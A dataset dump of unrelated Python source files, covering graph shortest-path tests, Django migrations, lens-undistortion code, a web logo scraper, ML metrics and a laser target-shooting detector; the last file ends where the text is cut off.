text stringlengths 38 1.54M |
|---|
for t in range(int(input())):
n, k = map(int, input().split())
A = list(map(int, input().split()))
B = [A[0]]
flag = 0
for i in range(1, n):
if B[-1] < k:
flag = i
break
B.append(B[-1] + A[i] - k)
if B[-1] < k and flag == 0:
flag = n
if flag != 0:
print('NO', flag)
else:
print('YES') |
from __future__ import print_function
import unittest
import numpy
import nifty
import nifty.graph
class TestShortesetPath(unittest.TestCase):
def graphAndWeights(self):
edges = numpy.array([
[0,1],
[1,2],
[2,3],
[3,4],
[0,5],
[4,5]
], dtype = 'uint64')
g = nifty.graph.UndirectedGraph(6)
g.insertEdges(edges)
weights = numpy.zeros(len(edges), dtype = 'float32')
weights[0] = 1.
weights[1] = 1.
weights[-1] = 5.
return g, weights
def testShortestPathDijkstraSingleTarget(self):
g, weights = self.graphAndWeights()
sp = nifty.graph.ShortestPathDijkstra(g)
path = sp.runSingleSourceSingleTarget(weights, 0, 4)
# shortest path 0 -> 4:
# 0 - 1, 1 - 2, 3 - 4
self.assertEqual(len(path), 5, str(len(path)))
path.reverse()
for ii in range(5):
self.assertEqual(path[ii], ii, "%i, %i" % (path[ii], ii))
def testShortestPathDijkstraSingleTargetParallel(self):
g, weights = self.graphAndWeights()
N = 50
sources = N * [0]
targets = N * [4]
parallelPaths = nifty.graph.shortestPathSingleTargetParallel(
g,
weights.tolist(),
sources,
targets,
returnNodes=True,
numberOfThreads=4
)
for path in parallelPaths:
# shortest path 0 -> 4:
# 0 - 1, 1 - 2, 3 - 4
self.assertEqual(len(path), 5, str(len(path)))
path.reverse()
for ii in range(5):
self.assertEqual(path[ii], ii, "%i, %i" % (path[ii], ii))
def testShortestPathDijkstraMultiTarget(self):
g, weights = self.graphAndWeights()
sp = nifty.graph.ShortestPathDijkstra(g)
# we need to check 2 times to make sure that more than 1 runs work
for _ in range(2):
paths = sp.runSingleSourceMultiTarget(weights, 0, [4,5])
self.assertEqual(len(paths), 2)
# shortest path 0 -> 4:
# 0 - 1, 1 - 2, 3 - 4
path = paths[0]
path.reverse()
self.assertEqual(len(path), 5, str(len(path)))
for ii in range(5):
self.assertEqual(path[ii], ii, "%i, %i" % (path[ii], ii))
# shortest path 0 -> 5:
# 0 - 5
path = paths[1]
path.reverse()
self.assertEqual(len(path) , 2, str(len(path)))
self.assertEqual(path[0] , 0, str(path[0]))
self.assertEqual(path[1] , 5, str(path[1]))
def testShortestPathDijkstraMultiTargetParallel(self):
g, weights = self.graphAndWeights()
N = 50
sources = N*[0]
targets = [[4,5] for _ in range(N)]
for _ in range(2):
parallelPaths = nifty.graph.shortestPathMultiTargetParallel(
g,
weights,
sources,
targets,
returnNodes=True,
numberOfThreads=5
)
for paths in parallelPaths:
self.assertEqual(len(paths), 2)
# shortest path 0 -> 4:
# 0 - 1, 1 - 2, 3 - 4
path = paths[0]
path.reverse()
self.assertEqual(len(path), 5, str(len(path)))
for ii in range(5):
self.assertEqual(path[ii] , ii, "%i, %i" % (path[ii], ii))
# shortest path 0 -> 5:
# 0 - 5
path = paths[1]
path.reverse()
self.assertEqual(len(path) , 2, str(len(path)))
self.assertEqual(path[0] , 0, str(path[0]))
self.assertEqual(path[1] , 5, str(path[1]))
def testShortestPathInvalid(self):
edges = numpy.array([
[0,1],
[2,3]
], dtype = 'uint64')
g = nifty.graph.UndirectedGraph(4)
g.insertEdges(edges)
sp = nifty.graph.ShortestPathDijkstra(g)
weights = [1.,1.]
path = sp.runSingleSourceSingleTarget(weights, 0, 3)
self.assertTrue(not path) # make sure that the path is invalid
if __name__ == '__main__':
unittest.main()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2016-10-30 16:09
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('board', '0013_edited_post_history'),
('board', '0013_TimeStampeModel modified_time'),
]
operations = [
]
|
import qrcode
import io
import sys
import os
if os.path.isfile("/home/pi/kcb-config/scripts/qrcode.png"):
os.remove("/home/pi/kcb-config/scripts/qrcode.png")
data = sys.argv[1]
qr = qrcode.QRCode(
version=1,
error_correction=qrcode.constants.ERROR_CORRECT_L,
box_size=10,
border=4,
)
qr.add_data(data)
qr.make(fit=True)
img = qr.make_image(fill_color='black', back_color='white')
img.save("/home/pi/kcb-config/scripts/qrcode.png")
|
#!/usr/bin/python3
"https://www.youtube.com/watch?v=EeQ8pwjQxTM"
def merge_sort(list1):
print("Splitting: ", list1)
if len(list1) > 1:
mid = len(list1) // 2
left = list1[0:mid]
right = list1[mid:]
merge_sort(left)
merge_sort(right)
i=j=k=0
while i < len(left) and j<len(right) :
if left[i] < right[j]:
list1[k] = left[i]
i = i+1
else:
list1[k] = right[j]
j = j+1
k = k+1
while i < len(left):
list1[k]=left[i]
k=k+1
i=i+1
while j< len(right):
list1[k] = right[j]
j=j+1
k=k+1
list1 = [54,26,93,17,77,31,44,55,20]
merge_sort(list1)
print(list1)
|
#다리를 지나는 트럭
def solution(bridge_length, weight, truck_weights):
answer = 0 #초
dic={} #트럭의 인덱스가 키, [무게, 거리] 값
i=0 #트럭 인덱스
finish=0 #다리를 지난 트럭의 수
while True:
if finish==len(truck_weights):
print("트럭이 모두 다리를 건넜습니다 {finish}")
break
answer+=1
print(f'{answer} 초')
sum=0
for v,_ in dic.values():
sum+=v
print(f'트럭 무게의 합 {sum}')
if i<len(truck_weights) and sum+truck_weights[i]<=weight:
dic[i]=[truck_weights[i],0]
i+=1
dic_keys=list(dic.keys())
print(f'dic의 key들 {dic_keys}')
for k in dic_keys:
print(f'{i} {dic}')
dic[k][1]+=1
if dic[k][1]==bridge_length:
print(f"빠지는 트럭 {dic[k][0]}")
dic.pop(k)
finish+=1
answer+=1
print(f'while이 끝난 뒤 second {answer}')
print(dic)
return answer
bridge_length=2
weight=10
truck_weights=[7,4,5,6]
print(solution(bridge_length, weight, truck_weights)) |
from lib.core.config import *
from lib.core.logger import log
import pymysql
class MyMysql(object):
def __init__(self):
self.config = Configure()
self.config = self.config.read(ConfType.MYSQL)
self.db = pymysql.connect(**self.config)
self.cursor = self.db.cursor(cursor=pymysql.cursors.DictCursor)
@log(7)
def execute_sql(self, sql):
row = self.cursor.execute(sql)
self.db.commit()
return row
@log(3)
def query_data(self, sql):
self.cursor.execute(sql)
data = self.cursor.fetchall()
return data
def __del__(self):
self.db.close()
if __name__ == '__main__':
MyMysql().query_data("SELECT *FROM zt_bug;")
|
from class1 import Car
if __name__ == "__main__":
car_1 = Car("KA013060",4)
car_2 = Car("KA013060",5)
car_3 = Car("KA013060",6)
car_4 = Car("KA013060",4)
car_5 = Car("KA013060",4)
car_1.start()
car_2.start()
car_3.start()
car_1.change_gear()
car_2.change_gear()
car_3.change_gear()
car_2.change_gear()
car_4.change_gear()
lst = [car_1,car_2,car_3,car_4,car_5]
for car in lst:
car.showInfo()
c = len(list(filter(lambda x:x.is_started and x.c_gear)))
print(c)
|
#Docdb 20515
import os,sys,string,time
from csv import reader
import numpy as np
def cummulate(a,lifetime=100):
if lifetime < 1:
return a*lifetime
b = np.zeros(len(a))
for i in range(0,len(a)):
begin = max(0,i-lifetime+1)
print ("begin",begin,lifetime)
for j in range(begin,i+1):
b[i] += a[j]
return b
def dump(n,k,a):
s = ""
s += "%5s, %10s (%s)"%(n,k,Units[k])
for j in range(0,len(a)):
s += ", "
s += "%8.1f"%a[j]
s += "\n"
return s
Years = np.array([2018,2019,2020,2021,2022,2023,2024,2025,2026,2027,2028,2029,2030])
size = len(Years)
Units = {"Events":"M", "Raw":"TB", "Test":"TB","Reco":"TB","CPU":"MHr","Sim Events":"M","Sim":"TB","Sim-CPU":"MHr","All":"TB"}
TapeLifetimes = {"Raw":100,"Test":.5,"Reco":15,"Sim":15}
DiskLifetimes = {"Raw":1,"Test":.5,"Reco":2,"Sim":2}
TapeCopies = {"Raw":2,"Test":.5,"Reco":1,"Sim":1}
DiskCopies = {"Raw":1,"Test":.5,"Reco":2,"Sim":2}
PerYear = {"Raw":1,"Test":1,"Reco":2,"Sim":1,"Events":1,"Sim Events":1,"CPU":2,"Sim-CPU":1}
StorageTypes = ["Raw","Test","Reco","Sim"]
Inputs = {}
data = []
file = open("Numbers-2020-11-28.csv",'r')
for line in reader(file):
if line[1] == "Year":
continue
print (line)
if line[0] == "":
continue
data = []
if (line[0] not in Inputs):
Inputs[line[0]] = {}
for i in range(2,15):
if line[i] == '':
break
data.append(float(line[i]))
print (data)
Inputs[line[0]][line[1]] = np.array(data)
print (line[0], line[1], Inputs[line[0]][line[1]])
o = open("out.csv",'w')
Totals = {}
for k in Inputs["ND"].keys():
Totals[k] = np.zeros(size)
for i in Inputs.keys():
for k in Inputs[i].keys():
# print ("%d%di,k, len(Inputs[i][k]))
Totals[k] = Totals[k] + Inputs[i][k]*PerYear[k]
o.write(dump(i,k,Inputs[i][k]))
# for j in Inputs[i]:
## print (i, j, len(Inputs[i][j]), Inputs[i][j])
# o.write ("%4s, %10s (%3s)"%(i,j,Units[j]))
#
# for k in range(0,size):
# o.write(", ")
# o.write ("%8.1f"%Inputs[i][j][k])
# o.write("\n")
for k in Totals:
print ("total:",k,Units[k], Totals[k])
o.write(dump("Total",k,Totals[k]))
# o.write ("Total %10s (%3s)"%(k,Units[k]))
# for j in range(0,size):
# o.write(", ")
# o.write ("%8.1f"%Totals[k][j])
# o.write("\n")
Tape = {}
CummulativeTape = {}
Disk = {}
CummulativeDisk = {}
#Tape["Raw"] = Totals["Raw"]*2
#CummulativeTape["Raw"] = cummulate(Tape["Raw"],100)
#o.write(dump("Tape","Raw",CummulativeTape["Raw"]))
#Tape["Reco"] = Totals["Reco"]
#CummulativeTape["Reco"] = cummulate(Tape["Reco"],2)
TotalTape = np.zeros(size)
TotalDisk = np.zeros(size)
for k in StorageTypes:
Tape[k] = Totals[k]*TapeCopies[k]
o.write(dump("Tape Copies",k,Tape[k]))
Disk[k] = Totals[k]*DiskCopies[k]
o.write(dump("Disk Copies",k,Disk[k]))
CummulativeTape[k] = cummulate(Tape[k],TapeLifetimes[k])
o.write(dump("Cummulative Tape Copies",k,CummulativeTape[k]))
CummulativeDisk[k] = cummulate(Disk[k],DiskLifetimes[k])
o.write(dump("Cummulative Disk Copies",k,CummulativeDisk[k]))
TotalTape += CummulativeTape[k]
TotalDisk += CummulativeDisk[k]
o.write(dump("Cummulative Tape","All",TotalTape))
o.write(dump("Cummulative Disk","All",TotalDisk))
|
# Generated by Django 3.1.1 on 2020-10-13 10:54
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('uakinotv', '0003_auto_20201012_2342'),
]
operations = [
migrations.AlterField(
model_name='filmvotes',
name='mark',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='uakinotv.vote', verbose_name='Оцінка'),
),
]
|
from bs4 import BeautifulSoup
from urllib2 import urlopen
import urllib
# adapted from https://github.com/nateberman/Python-WebImageScraper
def make_soup(url):
html = urlopen(url).read()
return BeautifulSoup(html, "html.parser")
def get_colleges(url):
soup = make_soup(url)
colleges = [coll for coll in soup.findAll("a", "bi")]
college_names = [each.get_text().replace(" ", "_") for each in colleges]
college_links = [each.get('href') for each in colleges]
return college_names, college_links
def get_logos(url):
c_names, c_links = get_colleges(url)
for i in range(len(c_names)):
get_logo(c_names[i], c_links[i])
def get_logo(name, link):
soup = make_soup(link)
parent = [p for p in soup.findAll(True, {'class':['brand-logo']})]
img_url = (parent[0].findAll("img")[0].get("src"))
filename = 'logos/'+name+'.png'
urllib.urlretrieve(img_url, filename)
get_logos('http://www.espn.com/college-football/teams') |
import pytest, json
from pprint import pprint
def test_wellformedjson():
data = json.load(open('simplewellformed.json'))
# pprint(data)
# data["maps"][0]["id"]
# data["masks"]["id"]
# print data["om_points"]
assert data["om_points"] == 'value'
assert bool(1) is True
def func(x):
return x + 1
def test_answer():
assert func(3) == 5
|
# 프로그램 명: r2
# 제한시간: 1 초
# r1,r2 의 평균 m 은
# m=(r1+r2)/2
# r1 , m 은 알고 있는데 r2 를 까먹었다. r2 를 구하여라.
# 입력
#
# 정수 r1,m 이 주어진다. 두 수는 -1000 이상 1000 이하이다.
# 출력
#
# r2 를 출력한다.
# 입출력 예
#
# 입력
#
# 11 15
#
# 출력
#
# 19
#
# 입력
#
# 4 3
#
# 출력
#
# 2
# 출처:coci 2006
r1,m=(int(x) for x in input().split())
print(m*2-r1) |
#
# module tank.core.tf
#
# Terraform-related code.
#
from os.path import dirname, isdir
from cement.utils import fs
from tank.core import resource_path
from tank.core.exc import TankError, TankTestCaseError
from tank.core.testcase import TestCase
class PlanGenerator:
"""
Generates a Terraform plan for the run based on the testcase and the user settings.
"""
def __init__(self, app, testcase: TestCase):
self._app = app
self.testcase = testcase
if not isdir(self._provider_templates):
raise TankError('Failed to find Terraform templates for cloud provider {} at {}'.format(
self._app.cloud_settings.provider.value, self._provider_templates
))
def generate(self, plan_dir: str):
if self.testcase.total_instances <= 10:
monitoring_machine_type = 'small'
elif self.testcase.total_instances < 50:
monitoring_machine_type = 'standard'
else:
monitoring_machine_type = 'large'
self._app.template.copy(self._provider_templates, plan_dir, {
'instances': self.testcase.instances,
'monitoring_machine_type': monitoring_machine_type,
})
@property
def _provider_templates(self) -> str:
return resource_path('providers', self._app.cloud_settings.provider.value)
|
import re
import unittest
EMAIL_PATTERN = re.compile(r'^([\w-]+(?:\.[\w-]+)*)@((?:[\w-]+\.)*\w[\w-]{0,66})\.([a-z]{2,6}(?:\.[a-z]{2})?)$')
class Email:
def __init__(self, email):
if EMAIL_PATTERN.match(email) is None:
raise ValueError('Invalid email')
self.email = email
class Person:
def __init__(self, first_name, last_name, email):
assert isinstance(first_name, str)
assert isinstance(last_name, str)
assert isinstance(email, str)
self.first_name = first_name
self.last_name = last_name
self.email = Email(email)
class PersonTests(unittest.TestCase):
def test_valid_email(self):
Person('Jan', 'Kowalski', 'jan@kowalski.pl')
def test_invalid_email(self):
with self.assertRaises(ValueError):
Person('Jan', 'Kowalski', 'invalid email')
if __name__ == "__main__":
unittest.main()
|
from __future__ import annotations
import torch
from kornia.geometry.linalg import transform_points
from kornia.geometry.transform import remap
from kornia.utils import create_meshgrid
from .distort import distort_points, tilt_projection
# Based on https://github.com/opencv/opencv/blob/master/modules/calib3d/src/undistort.dispatch.cpp#L384
def undistort_points(
points: torch.Tensor, K: torch.Tensor, dist: torch.Tensor, new_K: torch.Tensor | None = None, num_iters: int = 5
) -> torch.Tensor:
r"""Compensate for lens distortion a set of 2D image points.
Radial :math:`(k_1, k_2, k_3, k_4, k_5, k_6)`,
tangential :math:`(p_1, p_2)`, thin prism :math:`(s_1, s_2, s_3, s_4)`, and tilt :math:`(\tau_x, \tau_y)`
distortion models are considered in this function.
Args:
points: Input image points with shape :math:`(*, N, 2)`.
K: Intrinsic camera matrix with shape :math:`(*, 3, 3)`.
dist: Distortion coefficients
:math:`(k_1,k_2,p_1,p_2[,k_3[,k_4,k_5,k_6[,s_1,s_2,s_3,s_4[,\tau_x,\tau_y]]]])`. This is
a vector with 4, 5, 8, 12 or 14 elements with shape :math:`(*, n)`.
new_K: Intrinsic camera matrix of the distorted image. By default, it is the same as K but you may additionally
scale and shift the result by using a different matrix. Shape: :math:`(*, 3, 3)`. Default: None.
num_iters: Number of undistortion iterations. Default: 5.
Returns:
Undistorted 2D points with shape :math:`(*, N, 2)`.
Example:
>>> _ = torch.manual_seed(0)
>>> x = torch.rand(1, 4, 2)
>>> K = torch.eye(3)[None]
>>> dist = torch.rand(1, 4)
>>> undistort_points(x, K, dist)
tensor([[[-0.1513, -0.1165],
[ 0.0711, 0.1100],
[-0.0697, 0.0228],
[-0.1843, -0.1606]]])
"""
if points.dim() < 2 and points.shape[-1] != 2:
raise ValueError(f'points shape is invalid. Got {points.shape}.')
if K.shape[-2:] != (3, 3):
raise ValueError(f'K matrix shape is invalid. Got {K.shape}.')
if new_K is None:
new_K = K
elif new_K.shape[-2:] != (3, 3):
raise ValueError(f'new_K matrix shape is invalid. Got {new_K.shape}.')
if dist.shape[-1] not in [4, 5, 8, 12, 14]:
raise ValueError(f"Invalid number of distortion coefficients. Got {dist.shape[-1]}")
# Adding zeros to obtain vector with 14 coeffs.
if dist.shape[-1] < 14:
dist = torch.nn.functional.pad(dist, [0, 14 - dist.shape[-1]])
# Convert 2D points from pixels to normalized camera coordinates
cx: torch.Tensor = K[..., 0:1, 2] # princial point in x (Bx1)
cy: torch.Tensor = K[..., 1:2, 2] # princial point in y (Bx1)
fx: torch.Tensor = K[..., 0:1, 0] # focal in x (Bx1)
fy: torch.Tensor = K[..., 1:2, 1] # focal in y (Bx1)
# This is equivalent to K^-1 [u,v,1]^T
x: torch.Tensor = (points[..., 0] - cx) / fx # (BxN - Bx1)/Bx1 -> BxN
y: torch.Tensor = (points[..., 1] - cy) / fy # (BxN - Bx1)/Bx1 -> BxN
# Compensate for tilt distortion
if torch.any(dist[..., 12] != 0) or torch.any(dist[..., 13] != 0):
inv_tilt = tilt_projection(dist[..., 12], dist[..., 13], True)
# Transposed untilt points (instead of [x,y,1]^T, we obtain [x,y,1])
x, y = transform_points(inv_tilt, torch.stack([x, y], dim=-1)).unbind(-1)
# Iteratively undistort points
x0, y0 = x, y
for _ in range(num_iters):
r2 = x * x + y * y
inv_rad_poly = (1 + dist[..., 5:6] * r2 + dist[..., 6:7] * r2 * r2 + dist[..., 7:8] * r2**3) / (
1 + dist[..., 0:1] * r2 + dist[..., 1:2] * r2 * r2 + dist[..., 4:5] * r2**3
)
deltaX = (
2 * dist[..., 2:3] * x * y
+ dist[..., 3:4] * (r2 + 2 * x * x)
+ dist[..., 8:9] * r2
+ dist[..., 9:10] * r2 * r2
)
deltaY = (
dist[..., 2:3] * (r2 + 2 * y * y)
+ 2 * dist[..., 3:4] * x * y
+ dist[..., 10:11] * r2
+ dist[..., 11:12] * r2 * r2
)
x = (x0 - deltaX) * inv_rad_poly
y = (y0 - deltaY) * inv_rad_poly
# Convert points from normalized camera coordinates to pixel coordinates
new_cx: torch.Tensor = new_K[..., 0:1, 2] # princial point in x (Bx1)
new_cy: torch.Tensor = new_K[..., 1:2, 2] # princial point in y (Bx1)
new_fx: torch.Tensor = new_K[..., 0:1, 0] # focal in x (Bx1)
new_fy: torch.Tensor = new_K[..., 1:2, 1] # focal in y (Bx1)
x = new_fx * x + new_cx
y = new_fy * y + new_cy
return torch.stack([x, y], -1)
# Based on https://github.com/opencv/opencv/blob/master/modules/calib3d/src/undistort.dispatch.cpp#L287
def undistort_image(image: torch.Tensor, K: torch.Tensor, dist: torch.Tensor) -> torch.Tensor:
r"""Compensate an image for lens distortion.
Radial :math:`(k_1, k_2, k_3, k_4, k_4, k_6)`,
tangential :math:`(p_1, p_2)`, thin prism :math:`(s_1, s_2, s_3, s_4)`, and tilt :math:`(\tau_x, \tau_y)`
distortion models are considered in this function.
Args:
image: Input image with shape :math:`(*, C, H, W)`.
K: Intrinsic camera matrix with shape :math:`(*, 3, 3)`.
dist: Distortion coefficients
:math:`(k_1,k_2,p_1,p_2[,k_3[,k_4,k_5,k_6[,s_1,s_2,s_3,s_4[,\tau_x,\tau_y]]]])`. This is
a vector with 4, 5, 8, 12 or 14 elements with shape :math:`(*, n)`.
Returns:
Undistorted image with shape :math:`(*, C, H, W)`.
Example:
>>> img = torch.rand(1, 3, 5, 5)
>>> K = torch.eye(3)[None]
>>> dist_coeff = torch.rand(1, 4)
>>> out = undistort_image(img, K, dist_coeff)
>>> out.shape
torch.Size([1, 3, 5, 5])
"""
if len(image.shape) < 3:
raise ValueError(f"Image shape is invalid. Got: {image.shape}.")
if K.shape[-2:] != (3, 3):
raise ValueError(f'K matrix shape is invalid. Got {K.shape}.')
if dist.shape[-1] not in [4, 5, 8, 12, 14]:
raise ValueError(f'Invalid number of distortion coefficients. Got {dist.shape[-1]}.')
if not image.is_floating_point():
raise ValueError(f'Invalid input image data type. Input should be float. Got {image.dtype}.')
if image.shape[:-3] != K.shape[:-2] or image.shape[:-3] != dist.shape[:-1]:
# Input with image shape (1, C, H, W), K shape (3, 3), dist shape (4)
# allowed to avoid a breaking change.
if not all((image.shape[:-3] == (1,), K.shape[:-2] == (), dist.shape[:-1] == ())):
raise ValueError(
f'Input shape is invalid. Input batch dimensions should match. '
f'Got {image.shape[:-3]}, {K.shape[:-2]}, {dist.shape[:-1]}.'
)
channels, rows, cols = image.shape[-3:]
B = image.numel() // (channels * rows * cols)
# Create point coordinates for each pixel of the image
xy_grid: torch.Tensor = create_meshgrid(rows, cols, False, image.device, image.dtype)
pts = xy_grid.reshape(-1, 2) # (rows*cols)x2 matrix of pixel coordinates
# Distort points and define maps
ptsd: torch.Tensor = distort_points(pts, K, dist) # Bx(rows*cols)x2
mapx: torch.Tensor = ptsd[..., 0].reshape(B, rows, cols) # B x rows x cols, float
mapy: torch.Tensor = ptsd[..., 1].reshape(B, rows, cols) # B x rows x cols, float
# Remap image to undistort
out = remap(image.reshape(B, channels, rows, cols), mapx, mapy, align_corners=True)
return out.view_as(image)
|
from PySide2.QtWidgets import QWidget, QDesktopWidget
from PySide2.QtGui import QPainter,QColor,QFont
from field_map.map import FieldMap
class Minimap(QWidget):
def __init__(self):
super().__init__()
self.map = FieldMap()
self.setMouseTracking(True)
self.hover_x = 0
self.hover_y = 0
self.showCoordinate = False
self.scale = QDesktopWidget().screenGeometry().height() * 0.6 / self.map.width
self.width = self.map.length * self.scale
self.height = self.map.width * self.scale
self.setFixedSize(self.width, self.height)
self.zoom = 1
def paintEvent(self, event):
qp = QPainter()
qp.begin(self)
try:
self.paintMap(qp)
finally:
qp.end()
def mouseMoveEvent(self, event):
self.hover_x = event.x()
self.hover_y = event.y()
self.repaint()
def enterEvent(self, event):
self.showCoordinate = True
def leaveEvent(self, event):
self.showCoordinate = False
self.repaint()
def paintMap(self, qp):
rect = self.rect()
qp.setBrush(QColor(255, 255, 255))
assert rect.x() == 0
assert rect.y() == 0
scaled_origin_x = rect.x()
scaled_origin_y = rect.y()
qp.drawRect(scaled_origin_x, scaled_origin_y, self.width, self.height)
if self.showCoordinate:
if self.hover_x < self.width and self.hover_y < scaled_origin_y + self.height:
qp.drawText(QFont().pointSize(), QFont().pointSize() * 2, # 1em offset from both sides
f"{round(self.hover_x/self.scale,2)},{round((rect.height()-self.hover_y)/self.scale,2)}")
# TODO: draw axis
# TODO: implement zoom slide bar
__all__=['Minimap']
|
MODEL_BASE_CLASSES = ["Model","TimeStampedModel"]
SKIP_LIST=['today','objects','verbose_name']
MODEL_FILE_LOCATION = "project_code/models.py" |
import FWCore.ParameterSet.Config as cms
# import config for event selection, event print-out and analysis sequence
from TauAnalysis.Configuration.analyzeAHtoElecMu_cfi import *
analyzeAHtoElecMuEvents = cms.EDAnalyzer("GenericAnalyzer",
name = cms.string('ahElecMuAnalyzer'),
filters = cms.VPSet(
# generator level phase-space selection
# (NOTE: (1) to be used in case of Monte Carlo samples
# overlapping in simulated phase-space only !!
# (2) genPhaseSpaceCut needs to be **always** the first entry in the list of cuts
# - otherwise the script submitToBatch.csh for submission of cmsRun jobs
# to the CERN batch system will not work !!)
genPhaseSpaceCut,
# generator level selection of Z --> e + mu events
# passing basic acceptance and kinematic cuts
# (NOTE: to be used for efficiency studies only !!)
#genElectronCut,
#genMuonCut,
# trigger selection
evtSelTrigger,
# primary event vertex selection
evtSelPrimaryEventVertex,
evtSelPrimaryEventVertexQuality,
evtSelPrimaryEventVertexPosition,
# electron candidate selection
evtSelElectronIdMin,
#evtSelElectronIdMax,
evtSelElectronAntiCrack,
evtSelElectronEta, #default 2.1, switch to 2.4
evtSelElectronPt, #now 10
evtSelElectronIso,
#evtSelElectronTrkIso,
#evtSelElectronEcalIso,
#evtSelElectronHcalIso,
evtSelElectronTrk,
#evtSelElectronTrkIP, #mmm... we used to cut on combined d0 significance!
# muon candidate selection
evtSelGlobalMuonMin,
#evtSelGlobalMuonMax,
evtSelMuonEta, #default 2.1, switch to 2.4
evtSelMuonPt, #now 10
evtSelMuonIso,
#evtSelMuonTrkIso,
#evtSelMuonEcalIso,
#evtSelMuonHcalIso, #why not?
evtSelMuonAntiPion,
#evtSelMuonTrkIP, #mmm... we used to cut on combined d0 significance!
# di-tau candidate selection
evtSelDiTauCandidateForElecMuZeroCharge,
#evtSelDiTauCandidateForElecMuAcoplanarity, #use it in case of no collinear approximation?
evtSelDiTauCandidateForElecMuDPhi,
#evtSelDiTauCandidateForElecMuImpParamSig,
evtSelDiTauCandidateForElecMuOneLegPt,
# met selection...
evtSelMETMax,
# jet candidate selection...
evtSelJetMin, #default eta<2.1 too tight, need 2.4 for b-tagging
evtSelJetMax,
# b-tagging candidate selection...
evtSelJetBtagMin,
evtSelJetBtagMax
),
analyzers = cms.VPSet(
electronHistManager,
muonHistManager,
diTauCandidateHistManagerForElecMu,
caloMEtHistManager,
pfMEtHistManager,
jetHistManager,
vertexHistManager,
triggerHistManager
),
eventDumps = cms.VPSet(
elecMuEventDump
),
analysisSequence = elecMuAnalysisSequence
)
|
from numpy import array, int64, mean
from sklearn.metrics import accuracy_score,roc_auc_score
import pandas as pd
def calculate_metric(logits, y, threshold=0.5):
metric = {}
metric['accuracy']= accuracy_from_logits(logits, y, threshold)
metric['auc']= calculate_auc(logits, y)
return metric
def accuracy_from_logits(logits, y, threshold=0.5):
assert len(logits) == len(y)
nb_classes = len(logits[0])
y_preds = array(logits)
y = array(y)
y_preds = (y_preds > threshold).astype(int64)
accuracies ={}
for i in range(nb_classes):
accuracies[i]=accuracy_score(y[:, i], y_preds[:, i])
y_preds = y_preds.reshape((-1))
y = y.reshape((-1))
accuracies['all']=accuracy_score(y, y_preds)
return accuracies
def calculate_auc(logits, y):
assert len(logits) == len(y)
nb_classes = len(logits[0])
y_preds = array(logits)
y = array(y)
AUCs = {}
for i in range(nb_classes):
AUCs[i] = get_roc_auc_score(y[:, i], y_preds[:, i])
y_preds = y_preds.reshape((-1))
y = y.reshape((-1))
AUCs['all'] = get_roc_auc_score(y, y_preds)
return AUCs
def get_roc_auc_score(y,y_preds):
try:
auc=roc_auc_score(y, y_preds)
except ValueError:
auc=0
return auc
def calculate_mean(metric_dic):
final_mean_metric={}
for metric_type in metric_dic.keys():
metric=metric_dic[metric_type]
metric=pd.DataFrame(metric)
mean_metric=metric.mean()
final_mean_metric[metric_type]=mean_metric.to_dict()
return final_mean_metric |
import cv2
import numpy as np
import glob
from tqdm import tqdm
import imutils
from ipsctarget import Targetipsc
class Range():
def __init__(self):
"""Init function
"""
#class inits
print("Initializing target")
self.re_scale_factor_x = 1.0
self.re_scale_factor_y = 1.0
self.red_threshold = 230
self.target_points = []
self.targets = []
self.target_image_set = []
self.target_show = []
self.wait = False
def callback(self, x):
"""Callback function
Args:
x (None): dummy input
"""
pass
def click(self, event, x, y, flags, param):
"""Mouse click function
Args:
event (int): signifies which mouse button is clicked (4 is LMB)
x (int): pixelwise x coordinate of the click
y (int): pixelwise y coordinate of the click
flags ([type]): todo
param ([type]): todo
"""
#if click is detected
if event == 4:
#append coordinate to the list
self.target_points.append((x,y))
#write outs
print("Point added")
print("X : " + str(x))
print("Y : " + str(y))
def make_target(self, frame):
"""Make target function
Args:
frame (ndarray): given frame where user sets target boundries by clicking on the corners
"""
print("Please, mark the target")
#copy image from the frame
image = frame.copy()
#create window and set mouse callback
cv2.namedWindow("image")
cv2.setMouseCallback("image", self.click)
#resize image for viewing
#image = cv2.resize(image, None, fx = self.re_scale_factor_x, fy = self.re_scale_factor_y)
#while user chooses points of the field
while True:
#draw chosen points
if len(self.target_points) > 0:
for p in self.target_points:
cv2.circle(image, p, 3, (0, 0, 255), -1)
cv2.imshow("image", image)
key = cv2.waitKey(1) & 0xFF
#reset points and image
if key == ord('r'):
self.target_points = []
image = frame.copy()
image = cv2.resize(image,
None,
fx=self.re_scale_factor_x,
fy=self.re_scale_factor_y)
#exit if done
elif key == ord('c'):
break
#if there are more or equal 4 points
if len(self.target_points) >= 8:
#convert crop points
self.target_points = np.asarray(np.divide(self.target_points,
[self.re_scale_factor_x,
self.re_scale_factor_y]), int)
#create target
target = Targetipsc(self.target_points, len(self.targets))
#append target to the list
self.targets.append(target)
#TODO #NEED TO CHANGE THIS
self.target_image_set.append(cv2.imread("ipsctarget1.jpg"))
#reset target points
self.target_points = []
#reset all cv2 windows
cv2.destroyAllWindows()
def detect_shot(self, frame):
"""Function for detection of shots in the frame
Args:
frame (ndarray): a frame where the laser is detected
Returns:
tuple: coordinates of the shot, or None if no shot is detected,
should probably change that
"""
#checks if anything exists in a frame
if frame.any() > 0:
#extracts contours
cnts = cv2.findContours(frame.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
#if contours exists
if len(cnts) > 0:
for c in cnts:
if len(c) >= 4:
# compute the center of the contour
M = cv2.moments(c)
try:
cX = M["m10"] / M["m00"]
cY = M["m01"] / M["m00"]
except ZeroDivisionError:
return None
return (cX, cY)
else:
return None
def nothing(self, x):
"""Callback function for the trackbar, does nothing
"""
pass
def calibrate_red(self, cap):
"""Function for calibration of the red levels in the video stream
Args:
cap (cv2 video capture): capture stream from OpenCV
"""
#creates window and trackbar
cv2.namedWindow("Calibration")
cv2.createTrackbar('R', 'Calibration', self.red_threshold, 255, self.nothing)
#status flag
calibrate = True
while calibrate:
#read frame
ret, frame = cap.read()
#get red channel
red_frame = np.array(frame[:, :, 2])
#threshold the frame
red_frame[red_frame < self.red_threshold] = 0
#get trackbar position
self.red_threshold = cv2.getTrackbarPos('R','Calibration')
#show frame
cv2.imshow('Calibration', red_frame)
#detect keypress
keypress = cv2.waitKey(1) & 0xFF
#Break is q pressed
if keypress == ord('q'):
#stop calibration
calibrate = False
#destroy calibration window
